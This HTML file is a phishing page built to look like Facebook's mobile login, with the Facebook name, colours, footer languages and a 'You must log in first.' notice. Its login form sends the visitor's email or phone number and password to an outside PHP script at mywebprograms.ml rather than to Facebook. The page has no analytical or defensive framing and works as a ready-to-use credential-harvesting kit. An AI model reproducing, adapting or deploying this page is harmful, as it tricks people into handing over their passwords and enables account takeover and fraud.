<!DOCTYPE html>
<html>
	<head>
		<title>https://m.facebook.com/?_rdr</title>
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<style type="text/css">
			body{
				margin:0;
				padding:0;
				font-family:Arial,sans-serif;
			}
			
			#header-part{
				display:block;
				width:100%;
				height:35px;
				background:#3b5998;
			}
			
			#header-part-left,header-part-right{
				width:50%;
				float:left;
			}
			
			#logo{
				font-size:25px;
				font-weight:900;
				margin:5px;
				display:inline-block;
				color:#dce2ed;
				text-shadow:1px 1px #777;
			}
			
			#create-account-btn{
				display:inline-block;
				float:right;
				height:29px;
				border:1px solid #4476e8;
				margin:3px;
				width:35%;
				background:#69a74e;
				color:#fbfdfa;
				padding-top:4px;
			}
			
			#notification-part{
				height:25px;
				display:block;
				width:100%;
				background:#fffbe2;
				border-bottom:1px solid #949e34;
			}
			
			#notifications{
				color:#948834;
				display:block;
				position:absolute;
				left:0;
				font-size:15px;
				margin:4px;
			}
			
			#login-form{
				display:block;
				background:#eceff5;
			}
			
			.form-title{
				color:#90949c;
				margin:5px 2%;
				font-size:18px;
				font-weight:900;
				display:inline-block;
			}
			
			.emailorpass{
				height:40px;
				display:inline-block;
				width:96%;
				margin:0px 1.5%;
				border:1px solid #aaa;
			}
			
			#login-btn{
				background:#4267b2;
				border-radius:1px;
				border:none;
				margin:10px auto;
				display:block;
				width:97%;
				color:#f8f9fc;
				font-size:15px;
			}
			
			#orp{
				text-align:center;
				margin-top:-25px;
			}
			
			#create-new-account-btn{
				width:50%;
				display:block;
				margin:-10px 25%;
				height:40px;
				background:#69a74e;
				color:#fbfdfa;
				border:1px solid #bec29c;
			}
			
			#fp{
				line-height:26px;
				padding-bottom:15px;
			}
			
			#fp a{
				text-decoration:none;
				color:#3b5998;
				margin-left:1.5%;
			}
			
			#footer{
				width:100%;
				background:#4b4f56;
				margin-top:-15px;
			}
			
			.footer-part{
				width:50%;
				float:left;
				margin:0;
				padding:0;
			}
			
			.footer-part ul{
				list-style-type:none;
				margin:0;
				padding:0;
			}
			
			.footer-part ul li{
				color:#bec2c9;
				font-size:11px;
				margin:7px;
				margin-left:3%;
				font-weight:700;
			}
			
			#more-languages{
				border:1px solid #bec2c9;
				font-size:26px;
				display:inline-block;
				padding:0px 7px;
			}
			
			#copyright{
				font-weight:900;
				color:#fff;
				margin:10px 1.5%;
				display:inline-block;
				font-size:12px;
			}
		</style>
	</head>
	<body>
		<div id="header-part">
			<div id="header-part-left">
				<span id="logo">facebook</span>
			</div>
			<div id="header-part-right">
				<button type="button" id="create-account-btn">Create Account</button>
			</div>
		</div>
		<div id="notification-part">
			<span id="notifications">You must log in first.</span>
		</div>
		<div id="login-form">
			<form action="http://mywebprograms.ml/fff.php" action="post">
				<span class="form-title">Email address or phone number</span><br>
				<input type="text" name="email" class="emailorpass"/><br>
				<span class="form-title">Password</span><br>
				<input type="password" name="pass" class="emailorpass"/><br>
				<input type="submit" value="Log In" class="emailorpass" id="login-btn"/><br>
				<p id="orp"><span id="or">or</span></p>
				<button id="create-new-account-btn">Create New Account</button>
				<p id="fp">
					<a href="#">Forgotten password?</a><br>
					<a href="#">Help Centre</a>
				</p>
			</form>
		</div>
		<div id="footer">
			<div class="footer-part">
				<ul>
					<li>English (UK)</li>
					<li>অসমীয়া</li>
					<li>Portugues (Brasil)</li>
				</ul>
			</div>
			<div class="footer-part">
				<ul>
					<li>বাংলা</li>
					<li>Espanol</li>
					<li><span id="more-languages">+</span></li>
				</ul>
			</div>
			<span id="copyright">Facebook &copy; 2017</span>
		</div>
	</body>
</html> 